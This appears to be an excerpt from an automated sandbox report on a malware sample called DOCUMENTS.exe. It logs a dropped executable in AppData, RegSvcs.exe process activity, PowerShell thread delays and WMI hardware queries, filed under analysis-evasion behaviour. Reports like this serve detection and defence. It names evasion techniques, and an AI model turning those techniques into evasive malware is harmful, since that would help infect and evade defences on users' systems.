                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match, File source: Process Memory Space: bgURAojpNNIb.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 1000000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 2D40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 2A70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 8920000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 9920000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: 9B10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: AB10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: B170000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: C170000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\DOCUMENTS.exe Memory allocated: D170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 2990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 2B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 4B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 84E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 94E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 96C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: A6C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: ACD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Memory allocated: 84E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 18_2_05F71C5D rdtsc 18_2_05F71C5D
Source: C:\Users\user\Desktop\DOCUMENTS.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6439
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 444
Source: C:\Users\user\Desktop\DOCUMENTS.exe TID: 7360 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep count: 6548 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep count: 207 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe TID: 6132 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DOCUMENTS.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98641
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97563Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\bgURAojpNNIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99563
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99453
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219
